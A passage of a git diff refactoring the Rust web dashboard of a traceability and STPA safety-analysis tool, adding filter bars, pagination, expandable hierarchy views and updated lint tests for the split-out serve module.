let id_match = d + .artifact_id + .as_deref() + .unwrap_or("") + .to_lowercase() + .contains(&search_q); + let msg_match = d.message.to_lowercase().contains(&search_q); + id_match || msg_match + }); } - html.push_str( - "", - ); + // ── Paginate ─────────────────────────────────────────────────────── + let (page_slice, total_filtered) = paginate(&sorted, ¶ms); - // Show errors first, then warnings, then info - let mut sorted = diagnostics; - sorted.sort_by_key(|d| match d.severity { - Severity::Error => 0, - Severity::Warning => 1, - Severity::Info => 2, - }); + html.push_str(&pagination(total_filtered, ¶ms, "/validate")); - for d in &sorted { - let sev = match d.severity { - Severity::Error => "ERROR", - Severity::Warning => "WARN", - Severity::Info => "INFO", - }; - let art_id = d.artifact_id.as_deref().unwrap_or("-"); - let art_link = if d.artifact_id.is_some() && state.store.contains(art_id) { - format!( - "{art}", - art = html_escape(art_id) - ) - } else { - html_escape(art_id) - }; - html.push_str(&format!( - "", - html_escape(&d.rule), - html_escape(&d.message) - )); - } + // ── Table ────────────────────────────────────────────────────────── + let columns = [ + Column { + key: "severity".into(), + label: "Severity".into(), + sortable: true, + }, + Column { + key: "id".into(), + label: "Artifact".into(), + sortable: true, + }, + Column { + key: "rule".into(), + label: "Rule".into(), + sortable: false, + }, + Column { + key: "message".into(), + label: "Message".into(), + sortable: true, + }, + ]; + + let rows: Vec> = page_slice + .iter() + .map(|d| { + let sev = match d.severity { + Severity::Error => "ERROR".to_string(), + Severity::Warning => "WARN".to_string(), + Severity::Info => "INFO".to_string(), + }; + let art_id = d.artifact_id.as_deref().unwrap_or("-"); + let art_link = if d.artifact_id.is_some() && state.store.contains(art_id) { + format!( + "{art}", + art = html_escape(art_id) + ) + } else { + html_escape(art_id) + }; + vec![ + sev, + art_link, + html_escape(&d.rule), + html_escape(&d.message), + ] + }) + .collect(); + + html.push_str(&sortable_table(&TableConfig { + base_url: "/validate", + columns: &columns, + rows: &rows, + params: ¶ms, + })); + + html.push_str(&pagination(total_filtered, ¶ms, "/validate")); - html.push_str("
    SeverityArtifactRuleMessage
    {sev}{art_link}{}{}
    "); Html(html) } // ── Traceability Matrix ────────────────────────────────────────────────── #[derive(Debug, serde::Deserialize)] -struct MatrixParams { +pub(crate) struct MatrixParams { from: Option, to: Option, link: Option, direction: Option, } -async fn matrix_view( +pub(crate) async fn matrix_view( State(state): State, Query(params): Query, ) -> Html { @@ -3709,7 +1623,7 @@ async fn matrix_view( // ── Coverage ───────────────────────────────────────────────────────────── -async fn coverage_view(State(state): State) -> Html { +pub(crate) async fn coverage_view(State(state): State) -> Html { let state = state.read().await; let report = coverage::compute_coverage(&state.store, &state.schema, &state.graph); let overall = report.overall_coverage(); @@ -3831,7 +1745,7 @@ async fn coverage_view(State(state): State) -> Html { // ── Documents ──────────────────────────────────────────────────────────── -async fn documents_list(State(state): State) -> Html { +pub(crate) async fn documents_list(State(state): State) -> Html { let state = state.read().await; let doc_store = &state.doc_store; @@ -3879,7 +1793,10 @@ async fn documents_list(State(state): State) -> Html { Html(html) } -async fn document_detail(State(state): State, Path(id): Path) -> Html { +pub(crate) async fn document_detail( + State(state): State, + Path(id): Path, +) -> Html { let state = state.read().await; let doc_store = &state.doc_store; let store = &state.store; @@ -4016,7 +1933,7 @@ async fn document_detail(State(state): State, Path(id): Path, } @@ -4031,7 +1948,7 @@ struct SearchHit { url: String, } -async fn search_view( +pub(crate) async fn search_view( State(state): State, Query(params): Query, ) -> Html { @@ -4090,31 +2007,31 @@ async fn search_view( }); continue; } - if let Some(desc) = &artifact.description { - if desc.to_lowercase().contains(&query_lower) { - let desc_lower = desc.to_lowercase(); - let pos = desc_lower.find(&query_lower).unwrap_or(0); - let start = pos.saturating_sub(40); - let end = (pos + query.len() + 40).min(desc.len()); - let mut snippet = String::new(); - if start > 0 { - snippet.push_str("..."); - } - snippet.push_str(&desc[start..end]); - if end < desc.len() { - snippet.push_str("..."); - } - hits.push(SearchHit { - id: artifact.id.clone(), - title: artifact.title.clone(), - kind: "artifact", - type_name: artifact.artifact_type.clone(), - matched_field: "description", - context: snippet, - url: format!("/artifacts/{}", artifact.id), - }); - continue; + if let Some(desc) = &artifact.description + && desc.to_lowercase().contains(&query_lower) + { + let desc_lower = desc.to_lowercase(); + let pos = desc_lower.find(&query_lower).unwrap_or(0); + let start = pos.saturating_sub(40); + let end = (pos + query.len() + 40).min(desc.len()); + let mut snippet = String::new(); + if start > 0 { + snippet.push_str("..."); } + snippet.push_str(&desc[start..end]); + if end < desc.len() { + snippet.push_str("..."); + } + hits.push(SearchHit { + id: artifact.id.clone(), + title: artifact.title.clone(), + kind: "artifact", + type_name: artifact.artifact_type.clone(), + matched_field: "description", + context: snippet, + url: format!("/artifacts/{}", artifact.id), + }); + continue; } for tag in &artifact.tags { if tag.to_lowercase().contains(&query_lower) { @@ -4268,7 +2185,7 @@ fn highlight_match(text: &str, query: &str) -> String { // ── Verification ───────────────────────────────────────────────────────── -async fn verification_view(State(state): State) -> Html { +pub(crate) async fn verification_view(State(state): State) -> Html { let state = state.read().await; let store = &state.store; let graph = &state.graph; @@ -4571,16 +2488,19 @@ async fn verification_view(State(state): State) -> Html { // ── STPA ───────────────────────────────────────────────────────────────── -async fn stpa_view(State(state): State) -> Html { +pub(crate) async fn stpa_view( + State(state): State, + Query(params): Query, +) -> Html { let state = state.read().await; - stpa_partial(&state) + stpa_partial(&state, ¶ms) } -fn stpa_partial(state: &AppState) -> Html { +fn stpa_partial(state: &AppState, params: &ViewParams) -> Html { let store = &state.store; let graph = &state.graph; - let stpa_types = [ + let stpa_type_list: &[(&str, &str)] = &[ ("loss", "Losses"), ("hazard", "Hazards"), ("sub-hazard", "Sub-Hazards"), @@ -4593,7 +2513,10 @@ fn stpa_partial(state: &AppState) -> Html { ("loss-scenario", "Loss Scenarios"), ]; - let total: usize = stpa_types.iter().map(|(t, _)| store.count_by_type(t)).sum(); + let total: usize = stpa_type_list + .iter() + .map(|(t, _)| store.count_by_type(t)) + .sum(); let mut html = String::from("

    STPA Analysis

    "); @@ -4609,13 +2532,54 @@ fn stpa_partial(state: &AppState) -> Html { return Html(html); } - // Summary stat cards + // ── Filter bar ────────────────────────────────────────────────────── + let available_types: Vec = stpa_type_list.iter().map(|(t, _)| t.to_string()).collect(); + // UCA type sub-filter values used as "status" in the filter bar + let uca_subtypes: Vec = vec![ + "not-providing".into(), + "providing".into(), + "too-early-too-late".into(), + "stopped-too-soon".into(), + ]; + html.push_str(&filter_bar(&FilterBarConfig { + base_url: "/stpa", + available_types: &available_types, + available_statuses: &uca_subtypes, + params, + })); + + // ── Active filters ─────────────────────────────────────────────────── + let active_types = params.type_list(); + let search_q = params.q.as_deref().unwrap_or("").to_lowercase(); + let uca_subtype_filter = params.status.as_deref().unwrap_or(""); + + /// Returns true if an artifact ID/title passes the current search + type filters. + fn artifact_matches( + id: &str, + title: &str, + artifact_type: &str, + active_types: &[String], + search_q: &str, + ) -> bool { + if !active_types.is_empty() && !active_types.iter().any(|t| t == artifact_type) { + return false; + } + if !search_q.is_empty() + && !id.to_lowercase().contains(search_q) + && !title.to_lowercase().contains(search_q) + { + return false; + } + true + } + + // ── Summary stat cards ─────────────────────────────────────────────── html.push_str("
    "); let stat_colors = [ "#dc3545", "#fd7e14", "#fd7e14", "#20c997", "#6f42c1", "#6610f2", "#17a2b8", "#e83e8c", "#20c997", "#e83e8c", ]; - for (i, (type_name, label)) in stpa_types.iter().enumerate() { + for (i, (type_name, label)) in stpa_type_list.iter().enumerate() { let count = store.count_by_type(type_name); if count == 0 { continue; @@ -4629,8 +2593,52 @@ fn stpa_partial(state: &AppState) -> Html { } html.push_str("
    "); - // Hierarchy tree view - html.push_str("

    STPA Hierarchy

    "); + // ── Determine open IDs ─────────────────────────────────────────────── + // If no `open` param, default to expanding all losses and top-level hazards. + let open_ids: Vec = if params.open.is_some() { + params.open_list() + } else { + // Default: open all losses and all hazards + let mut ids: Vec = store.by_type("loss").to_vec(); + for h in store.by_type("hazard") { + ids.push(h.clone()); + } + ids.sort(); + ids + }; + + // ── Build expand/collapse all URLs ─────────────────────────────────── + // Collect all loss + hazard IDs for "expand all" at the hierarchy level + let all_tree_ids: Vec = { + let mut ids: Vec = store.by_type("loss").to_vec(); + for h in store.by_type("hazard") { + ids.push(h.clone()); + } + for u in store.by_type("uca") { + ids.push(u.clone()); + } + ids.sort(); + ids + }; + let expand_qs = params.to_query_string(&[("open", &all_tree_ids.join(","))]); + let collapse_qs = params.to_query_string(&[("open", "")]); + + // ── Hierarchy tree view ────────────────────────────────────────────── + html.push_str("

    STPA Hierarchy

    "); + + // Expand/Collapse buttons + html.push_str(&format!( + "" + )); + + html.push_str("
    "); let losses = store.by_type("loss"); if losses.is_empty() { @@ -4639,14 +2647,28 @@ fn stpa_partial(state: &AppState) -> Html { ); } - let mut sorted_losses: Vec<&str> = losses.iter().map(|s| s.as_str()).collect(); + let mut sorted_losses: Vec = losses.to_vec(); sorted_losses.sort(); + // Count visible losses for filtered-empty message + let mut visible_loss_count = 0usize; + for loss_id in &sorted_losses { let Some(loss) = store.get(loss_id) else { continue; }; - html.push_str("
    "); + + // Apply type + search filter at loss level + if !artifact_matches(loss_id, &loss.title, "loss", &active_types, &search_q) { + continue; + } + visible_loss_count += 1; + + let loss_open = open_ids.iter().any(|id| id == loss_id); + let open_attr = if loss_open { " open" } else { "" }; + html.push_str(&format!( + "
    " + )); html.push_str(" "); html.push_str(&badge_for_type("loss")); html.push_str(&format!( @@ -4670,7 +2692,29 @@ fn stpa_partial(state: &AppState) -> Html { let Some(hazard) = store.get(hazard_id) else { continue; }; - html.push_str("
    "); + + // Filter hazards if type filter is active for hazard types + // (only hide when filtering specifically for non-hazard types) + let hazard_visible = active_types.is_empty() + || active_types + .iter() + .any(|t| t == "hazard" || t == "sub-hazard") + || artifact_matches( + hazard_id, + &hazard.title, + &hazard.artifact_type, + &active_types, + &search_q, + ); + if !hazard_visible { + continue; + } + + let hazard_open = open_ids.iter().any(|id| id == *hazard_id); + let h_open_attr = if hazard_open { " open" } else { "" }; + html.push_str(&format!( + "
    " + )); html.push_str(" "); html.push_str("leads-to-loss"); html.push_str(&badge_for_type(&hazard.artifact_type)); @@ -4732,8 +2776,32 @@ fn stpa_partial(state: &AppState) -> Html { let Some(uca) = store.get(uca_id) else { continue; }; - // Collapse below level 2 - html.push_str("
    "); + + // Apply UCA subtype filter + if !uca_subtype_filter.is_empty() { + let ut = uca + .fields + .get("uca-type") + .and_then(|v| v.as_str()) + .unwrap_or(""); + if ut != uca_subtype_filter { + continue; + } + } + + // Apply search filter to UCAs + if !search_q.is_empty() + && !uca_id.to_lowercase().contains(&search_q) + && !uca.title.to_lowercase().contains(&search_q) + { + continue; + } + + let uca_open = open_ids.iter().any(|id| id == *uca_id); + let u_open_attr = if uca_open { " open" } else { "" }; + html.push_str(&format!( + "
    " + )); html.push_str(" "); html.push_str("leads-to-hazard"); html.push_str(&badge_for_type("uca")); @@ -4799,11 +2867,17 @@ fn stpa_partial(state: &AppState) -> Html { html.push_str("
    "); // Loss } + if visible_loss_count == 0 && !sorted_losses.is_empty() { + html.push_str( + "

    No losses match the current filter.

    ", + ); + } + html.push_str("
    "); // stpa-tree, card - // UCA Table - let uca_ids = store.by_type("uca"); - if !uca_ids.is_empty() { + // ── UCA Table ──────────────────────────────────────────────────────── + let all_uca_ids_slice = store.by_type("uca"); + if !all_uca_ids_slice.is_empty() { html.push_str("

    Unsafe Control Actions

    "); struct UcaRow { @@ -4815,8 +2889,8 @@ fn stpa_partial(state: &AppState) -> Html { } let mut rows: Vec = Vec::new(); - for uca_id in uca_ids { - let Some(uca) = store.get(uca_id) else { + for uca_id in all_uca_ids_slice { + let Some(uca) = store.get(uca_id.as_str()) else { continue; }; let uca_type = uca @@ -4825,6 +2899,25 @@ fn stpa_partial(state: &AppState) -> Html { .and_then(|v| v.as_str()) .unwrap_or("-") .to_string(); + + // Apply UCA subtype filter to the table too + if !uca_subtype_filter.is_empty() && uca_type != uca_subtype_filter { + continue; + } + + // Apply type filter (only show if "uca" is in types or no type filter) + if !active_types.is_empty() && !active_types.iter().any(|t| t == "uca") { + continue; + } + + // Apply search filter + if !search_q.is_empty() + && !uca_id.to_lowercase().contains(&search_q) + && !uca.title.to_lowercase().contains(&search_q) + { + continue; + } + let controller_links: Vec<&str> = uca .links .iter() @@ -4868,64 +2961,71 @@ fn stpa_partial(state: &AppState) -> Html { .then(a.id.cmp(&b.id)) }); - html.push_str( - "\ - \ - \ - ", - ); + if rows.is_empty() { + html.push_str( + "

    No UCAs match the current filter.

    ", + ); + } else { + html.push_str( + "
    IDControl ActionUCA TypeDescriptionLinked Hazards
    \ + \ + \ + ", + ); - for row in &rows { - let type_class = match row.uca_type.as_str() { - "not-providing" => "uca-type-not-providing", - "providing" => "uca-type-providing", - "too-early-too-late" => "uca-type-too-early-too-late", - "stopped-too-soon" => "uca-type-stopped-too-soon", - _ => "", - }; - let type_badge = if type_class.is_empty() { - html_escape(&row.uca_type) - } else { - format!( - "{}", - html_escape(&row.uca_type), - ) - }; - let hazard_links: Vec = row - .linked_hazards - .iter() - .map(|h| { + for row in &rows { + let type_class = match row.uca_type.as_str() { + "not-providing" => "uca-type-not-providing", + "providing" => "uca-type-providing", + "too-early-too-late" => "uca-type-too-early-too-late", + "stopped-too-soon" => "uca-type-stopped-too-soon", + _ => "", + }; + let type_badge = if type_class.is_empty() { + html_escape(&row.uca_type) + } else { + format!( + "{}", + html_escape(&row.uca_type), + ) + }; + let hazard_links: Vec = row + .linked_hazards + .iter() + .map(|h| { + format!( + "{id}", + id = html_escape(h), + ) + }) + .collect(); + let ca_display = if row.control_action == "-" { + "-".to_string() + } else { format!( "{id}", - id = html_escape(h), + style=\"font-family:var(--mono);font-size:.8rem\">{id}", + id = html_escape(&row.control_action), ) - }) - .collect(); - let ca_display = if row.control_action == "-" { - "-".to_string() - } else { - format!( - "{id}", - id = html_escape(&row.control_action), - ) - }; - html.push_str(&format!( - "\ - \ - \ - \ - \ - ", - id = html_escape(&row.id), - ca = ca_display, - title = html_escape(&row.title), - hazards = hazard_links.join(", "), - )); - } + }; + html.push_str(&format!( + "\ + \ + \ + \ + \ + ", + id = html_escape(&row.id), + ca = ca_display, + title = html_escape(&row.title), + hazards = hazard_links.join(", "), + )); + } - html.push_str("
    IDControl ActionUCA TypeDescriptionLinked Hazards
    {id}{ca}{type_badge}{title}{hazards}
    {id}{ca}{type_badge}{title}{hazards}
    "); + html.push_str(""); + } + html.push_str("
    "); } html.push_str(&format!( @@ -4937,7 +3037,7 @@ fn stpa_partial(state: &AppState) -> Html { // ── Results ────────────────────────────────────────────────────────────── -async fn results_view(State(state): State) -> Html { +pub(crate) async fn results_view(State(state): State) -> Html { let state = state.read().await; let result_store = &state.result_store; @@ -5026,7 +3126,7 @@ async fn results_view(State(state): State) -> Html { Html(html) } -async fn result_detail( +pub(crate) async fn result_detail( State(state): State, Path(run_id): Path, ) -> Html { @@ -5224,7 +3324,7 @@ fn render_tree(entries: &[TreeEntry], html: &mut String, depth: usize) { html.push_str(""); } -async fn source_tree_view(State(state): State) -> Html { +pub(crate) async fn source_tree_view(State(state): State) -> Html { let state = state.read().await; let project_path = &state.project_path_buf; let tree = build_tree(project_path, "", 0); @@ -5282,31 +3382,31 @@ fn artifacts_referencing_file(store: &rivet_core::store::Store, file_rel: &str) for a in store.iter() { // Check source_file (existing behavior) - if let Some(sf) = &a.source_file { - if sf == rel || sf.ends_with(file_rel) { + if let Some(sf) = &a.source_file + && (sf == rel || sf.ends_with(file_rel)) + { + refs.push(FileRef { + id: a.id.clone(), + artifact_type: a.artifact_type.clone(), + title: a.title.clone(), + line: None, + end_line: None, + }); + continue; + } + // Scan string fields for file:line references matching this file + for value in a.fields.values() { + if let serde_yaml::Value::String(s) = value + && let Some((_file, line, end_line)) = extract_file_ref(s, file_rel) + { refs.push(FileRef { id: a.id.clone(), artifact_type: a.artifact_type.clone(), title: a.title.clone(), - line: None, - end_line: None, + line, + end_line, }); - continue; - } - } - // Scan string fields for file:line references matching this file - for value in a.fields.values() { - if let serde_yaml::Value::String(s) = value { - if let Some((_file, line, end_line)) = extract_file_ref(s, file_rel) { - refs.push(FileRef { - id: a.id.clone(), - artifact_type: a.artifact_type.clone(), - title: a.title.clone(), - line, - end_line, - }); - break; // one ref per artifact is enough - } + break; // one ref per artifact is enough } } } @@ -5340,7 +3440,7 @@ fn extract_file_ref(val: &str, target_file: &str) -> Option<(String, Option Some((target_file.to_string(), None, None)) } -async fn source_file_view( +pub(crate) async fn source_file_view( State(state): State, Path(raw_path): Path, ) -> Html { @@ -6005,7 +4105,7 @@ fn render_code_block( // ── Diff ───────────────────────────────────────────────────────────────── #[derive(Debug, serde::Deserialize)] -struct DiffParams { +pub(crate) struct DiffParams { base: Option, head: Option, } @@ -6124,7 +4224,7 @@ fn diff_ref_options(sel: &str, tags: &[String], branches: &[String], inc_wt: boo h } -async fn diff_view( +pub(crate) async fn diff_view( State(state): State, Query(params): Query, ) -> Html { @@ -6249,7 +4349,7 @@ async fn diff_view( // ── Document linkage view ──────────────────────────────────────────────── -async fn doc_linkage_view(State(state): State) -> Html { +pub(crate) async fn doc_linkage_view(State(state): State) -> Html { let state = state.read().await; let store = &state.store; let doc_store = &state.doc_store; @@ -6348,13 +4448,13 @@ async fn doc_linkage_view(State(state): State) -> Html { for (aid, src_node) in &art_to_node { if let Some(a) = store.get(aid) { for link in &a.links { - if let Some(tgt_node) = art_to_node.get(&link.target) { - if tgt_node != src_node { - edge_types - .entry((src_node.clone(), tgt_node.clone())) - .or_default() - .insert(link.link_type.clone()); - } + if let Some(tgt_node) = art_to_node.get(&link.target) + && tgt_node != src_node + { + edge_types + .entry((src_node.clone(), tgt_node.clone())) + .or_default() + .insert(link.link_type.clone()); } } } @@ -6426,15 +4526,26 @@ async fn doc_linkage_view(State(state): State) -> Html { label: label.clone(), node_type: node_type.into(), sublabel, + parent: None, + ports: vec![], } }, - &|_idx, e| EdgeInfo { label: e.clone() }, + &|_idx, e| EdgeInfo { + label: e.clone(), + source_port: None, + target_port: None, + }, &layout_opts, ); let svg = render_svg(&gl, &svg_opts); html.push_str( - "
    \ + "
    \ +
    \ + \ + \ + \ +
    \
    \
    \ \ @@ -6469,10 +4580,11 @@ async fn doc_linkage_view(State(state): State) -> Html { for aid in &doc.artifact_ids { if let Some(a) = store.get(aid) { for link in &a.links { - if let Some(target_doc) = art_to_doc.get(&link.target) { - if target_doc != &doc.id { - cross_link_count += 1; - html.push_str(&format!( + if let Some(target_doc) = art_to_doc.get(&link.target) + && target_doc != &doc.id + { + cross_link_count += 1; + html.push_str(&format!( "{src_doc}\ {aid}\ {lt}\ @@ -6483,7 +4595,6 @@ async fn doc_linkage_view(State(state): State) -> Html { tgt = html_escape(&link.target), tgt_doc = html_escape(target_doc), )); - } } } } @@ -6555,14 +4666,14 @@ async fn doc_linkage_view(State(state): State) -> Html { // ── Traceability explorer ──────────────────────────────────────────────── #[derive(Debug, serde::Deserialize)] -struct TraceParams { +pub(crate) struct TraceParams { root_type: Option, status: Option, search: Option, } #[derive(Debug, serde::Deserialize)] -struct TraceHistoryParams { +pub(crate) struct TraceHistoryParams { file: Option, } @@ -6682,9 +4793,10 @@ fn render_trace_node(node: &TraceNode, depth: usize, project_path: &str) -> Stri } } -async fn traceability_view( +pub(crate) async fn traceability_view( State(state): State, Query(params): Query, + Query(view_params): Query, ) -> Html { let state = state.read().await; let store = &state.store; @@ -6703,7 +4815,20 @@ async fn traceability_view( }; let root_type = params.root_type.as_deref().unwrap_or(default_root); let status_filter = params.status.as_deref().unwrap_or("all"); - let search_filter = params.search.as_deref().unwrap_or("").to_lowercase(); + + // `q` from ViewParams overrides the legacy `search` param if provided. + let search_filter = { + let q = view_params.q.as_deref().unwrap_or("").trim(); + if !q.is_empty() { + q.to_lowercase() + } else { + params.search.as_deref().unwrap_or("").to_lowercase() + } + }; + + // ViewParams `types`: filter root artifacts to only those whose + // artifact_type matches one of the listed types. + let type_filter = view_params.type_list(); // Get root artifacts let mut root_ids: Vec<&str> = store @@ -6722,7 +4847,7 @@ async fn traceability_view( if status_filter != "all" && a.status.as_deref().unwrap_or("") != status_filter { return false; } - // Search filter + // Text search filter (ID or title) if !search_filter.is_empty() { let id_match = id.to_lowercase().contains(&search_filter); let title_match = a.title.to_lowercase().contains(&search_filter); @@ -6730,6 +4855,10 @@ async fn traceability_view( return false; } } + // ViewParams types filter + if !type_filter.is_empty() && !type_filter.contains(&a.artifact_type) { + return false; + } true } else { false @@ -6740,7 +4869,8 @@ async fn traceability_view( let mut html = String::from("

    Traceability Explorer

    "); // ── Filter controls ────────────────────────────────────────────── - html.push_str("
    "); + let q_val = view_params.q.as_deref().unwrap_or(""); + html.push_str("
    "); html.push_str("
    "); + // Search uses `q` (ViewParams) so it is preserved in URL alongside other ViewParams. html.push_str(&format!( - "
    ", - html_escape(&search_filter) + "
    ", + html_escape(q_val) )); + // Type filter checkboxes — all artifact types in store. + if !all_types.is_empty() { + html.push_str("
    "); + html.push_str(""); + for t in &all_types { + let checked = if type_filter.contains(&t.to_string()) { + " checked" + } else { + "" + }; + html.push_str(&format!( + "", + t_esc = html_escape(t), + checked = checked, + )); + } + html.push_str("
    "); + } html.push_str("
    "); html.push_str("
    "); @@ -6908,7 +5058,7 @@ fn source_path_for_artifact(store: &Store, id: &str) -> String { } /// HTMX endpoint: return git history for a specific file as HTML fragment. -async fn traceability_history( +pub(crate) async fn traceability_history( State(state): State, Query(params): Query, ) -> Html { @@ -6968,197 +5118,7 @@ async fn traceability_history( // ── Helpers ────────────────────────────────────────────────────────────── -fn html_escape(s: &str) -> String { - s.replace('&', "&") - .replace('<', "<") - .replace('>', ">") - .replace('"', """) -} - -/// Rewrite relative image `src` paths to serve through `/docs-asset/`. -/// Leaves absolute URLs (http://, https://, //) unchanged. -fn rewrite_image_paths(html: &str) -> String { - let mut result = String::with_capacity(html.len()); - let mut rest = html; - while let Some(pos) = rest.find("src=\"") { - result.push_str(&rest[..pos]); - let after_src = &rest[pos + 5..]; // after src=" - if let Some(end) = after_src.find('"') { - let path = &after_src[..end]; - result.push_str("src=\""); - if path.starts_with("http://") - || path.starts_with("https://") - || path.starts_with("//") - || path.starts_with('/') - { - result.push_str(path); - } else { - result.push_str("/docs-asset/"); - result.push_str(path); - } - result.push('"'); - rest = &after_src[end + 1..]; - } else { - result.push_str("src=\""); - rest = after_src; - } - } - result.push_str(rest); - result -} - -/// Turn `path/to/file.rs:42` patterns into clickable `/source/path/to/file.rs#L42` links. -/// Also handles ranges like `file.rs:10-20` and plain `path/to/file.rs` (no line). -fn linkify_source_refs(s: &str) -> String { - // Regex-free: scan for patterns like word/word.ext:digits or word/word.ext:digits-digits - let mut result = String::new(); - let src = s; - let mut pos = 0usize; - - while pos < src.len() { - // Look for file-like patterns: contains '/' or '.' and optionally ':digits' - if let Some(m) = find_source_ref(&src[pos..]) { - result.push_str(&src[pos..pos + m.start]); - let file_path = &m.file; - let encoded_path = urlencoding::encode(file_path); - if let Some(line) = m.line { - if let Some(end_line) = m.end_line { - result.push_str(&format!( - "{file_path}:{line}-{end_line}" - )); - } else { - result.push_str(&format!( - "{file_path}:{line}" - )); - } - } else { - result.push_str(&format!( - "{file_path}" - )); - } - pos += m.start + m.len; - } else { - result.push_str(&src[pos..]); - break; - } - } - result -} - -struct SourceRefMatch { - start: usize, - len: usize, - file: String, - line: Option, - end_line: Option, -} - -/// Find the next source-ref pattern in text: `some/path.ext:line` or `some/path.ext:line-line` -/// File must contain a `/` or `.` with a recognized extension. -fn find_source_ref(s: &str) -> Option { - let extensions = [ - ".rs", ".yaml", ".yml", ".toml", ".md", ".py", ".js", ".ts", ".tsx", ".jsx", ".c", ".h", - ".cpp", ".hpp", ".go", ".java", ".rb", ".sh", ".json", ".xml", ".aadl", - ]; - let len = s.len(); - let mut i = 0; - while i < len { - // Try to match a file path starting at position i - // A file path: sequence of [a-zA-Z0-9_/.\-] containing at least one '/' and ending with a known extension - let start = i; - let mut j = i; - let mut has_slash = false; - let mut has_ext = false; - while j < len { - let c = s.as_bytes()[j]; - if c.is_ascii_alphanumeric() || c == b'_' || c == b'/' || c == b'.' || c == b'-' { - if c == b'/' { - has_slash = true; - } - j += 1; - } else { - break; - } - } - if has_slash && j > start + 2 { - let candidate = &s[start..j]; - // Check if it ends with a known extension - for ext in &extensions { - if candidate.ends_with(ext) { - has_ext = true; - break; - } - } - if has_ext { - let file = candidate.to_string(); - // Check for :line or :line-line - if j < len && s.as_bytes()[j] == b':' { - let _colon_pos = j; - j += 1; - let line_start = j; - while j < len && s.as_bytes()[j].is_ascii_digit() { - j += 1; - } - if j > line_start { - let line: u32 = s[line_start..j].parse().unwrap_or(0); - if line > 0 { - // Check for range: -digits - if j < len && s.as_bytes()[j] == b'-' { - let dash = j; - j += 1; - let end_start = j; - while j < len && s.as_bytes()[j].is_ascii_digit() { - j += 1; - } - if j > end_start { - let end_line: u32 = s[end_start..j].parse().unwrap_or(0); - if end_line > 0 { - return Some(SourceRefMatch { - start, - len: j - start, - file, - line: Some(line), - end_line: Some(end_line), - }); - } - } - // Not a valid range, just use line - return Some(SourceRefMatch { - start, - len: dash - start, - file, - line: Some(line), - end_line: None, - }); - } - return Some(SourceRefMatch { - start, - len: j - start, - file, - line: Some(line), - end_line: None, - }); - } - } - } - // No line number, just file path - return Some(SourceRefMatch { - start, - len: j - start, - file, - line: None, - end_line: None, - }); - } - } - i += 1; - } - None -} - -// ── Help / Docs / Schema dashboard views ─────────────────────────────── - -async fn help_view(State(state): State) -> Html { +pub(crate) async fn help_view(State(state): State) -> Html { let state = state.read().await; let schema = &state.schema; @@ -7237,7 +5197,7 @@ async fn help_view(State(state): State) -> Html { Html(html) } -async fn help_docs_list(State(_state): State) -> Html { +pub(crate) async fn help_docs_list(State(_state): State) -> Html { let raw = docs::list_topics("text"); let mut html = String::with_capacity(4096); @@ -7288,7 +5248,7 @@ async fn help_docs_list(State(_state): State) -> Html { Html(html) } -async fn help_docs_topic( +pub(crate) async fn help_docs_topic( State(_state): State, Path(slug): Path, ) -> Html { @@ -7388,7 +5348,7 @@ async fn help_docs_topic( Html(html) } -async fn help_schema_list(State(state): State) -> Html { +pub(crate) async fn help_schema_list(State(state): State) -> Html { let state = state.read().await; let schema = &state.schema; @@ -7427,7 +5387,7 @@ async fn help_schema_list(State(state): State) -> Html { Html(html) } -async fn help_schema_show( +pub(crate) async fn help_schema_show( State(state): State, Path(name): Path, ) -> Html { @@ -7445,7 +5405,7 @@ async fn help_schema_show( Html(html) } -async fn help_links_view(State(state): State) -> Html { +pub(crate) async fn help_links_view(State(state): State) -> Html { let state = state.read().await; let schema = &state.schema; @@ -7476,7 +5436,7 @@ async fn help_links_view(State(state): State) -> Html { Html(html) } -async fn help_rules_view(State(state): State) -> Html { +pub(crate) async fn help_rules_view(State(state): State) -> Html { let state = state.read().await; let raw = schema_cmd::cmd_rules(&state.schema, "text"); diff --git a/rivet-cli/tests/serve_lint.rs b/rivet-cli/tests/serve_lint.rs index fb8ede7..f63d870 100644 --- a/rivet-cli/tests/serve_lint.rs +++ b/rivet-cli/tests/serve_lint.rs @@ -6,9 +6,24 @@ use std::path::PathBuf; -/// Return the path to `serve.rs` relative to the workspace. -fn serve_rs_path() -> PathBuf { - PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("src/serve.rs") +/// Return the path to the `serve/` module directory. +fn serve_dir() -> PathBuf { + PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("src/serve") +} + +/// Read and concatenate all `.rs` source files in the serve module. +fn read_serve_sources() -> String { + let dir = serve_dir(); + let mut combined = String::new(); + for entry in std::fs::read_dir(&dir).expect("failed to read serve/ dir") { + let entry = entry.unwrap(); + let path = entry.path(); + if path.extension().is_some_and(|e| e == "rs") { + combined.push_str(&std::fs::read_to_string(&path).unwrap_or_default()); + combined.push('\n'); + } + } + combined } /// Every `hx-get` link that targets `#content` MUST also include @@ -21,7 +36,7 @@ fn serve_rs_path() -> PathBuf { /// - Lines that already contain `hx-push-url` #[test] fn all_content_links_push_url() { - let source = std::fs::read_to_string(serve_rs_path()).expect("failed to read serve.rs"); + let source = read_serve_sources(); let mut violations = Vec::new(); @@ -70,17 +85,17 @@ fn all_content_links_push_url() { /// the full page layout with content already rendered (no redirect needed). #[test] fn wrap_middleware_exists() { - let source = std::fs::read_to_string(serve_rs_path()).expect("failed to read serve.rs"); + let source = read_serve_sources(); assert!( source.contains("hx-request") || source.contains("HX-Request"), - "serve.rs must check the HX-Request header to distinguish \ + "serve module must check the HX-Request header to distinguish \ HTMX partial requests from direct browser navigations" ); assert!( source.contains("wrap_full_page"), - "serve.rs must contain the wrap_full_page middleware \ + "serve module must contain the wrap_full_page middleware \ for direct-access full-page rendering" ); @@ -95,7 +110,7 @@ fn wrap_middleware_exists() { /// so reloading stays on the current page instead of navigating to root. #[test] fn reload_uses_hx_location() { - let source = std::fs::read_to_string(serve_rs_path()).expect("failed to read serve.rs"); + let source = read_serve_sources(); // The reload handler should reference HX-Location for in-place reload assert!( diff --git a/rivet-core/Cargo.toml b/rivet-core/Cargo.toml index 5784178..3fbbf97 100644 --- a/rivet-core/Cargo.toml +++ b/rivet-core/Cargo.toml @@ -43,6 +43,9 @@ tokio = { workspace = true } tempfile = "3" serial_test = "3" +[lints] +workspace = true + [[bench]] name = "core_benchmarks" harness = false diff --git a/rivet-core/src/document.rs b/rivet-core/src/document.rs index 9ce11f6..e3ad5e7 100644 --- a/rivet-core/src/document.rs +++ b/rivet-core/src/document.rs @@ -654,61 +654,65 @@ fn resolve_inline( while let Some((i, ch)) = chars.next() { // Images: ![alt](url) - if ch == '!' && 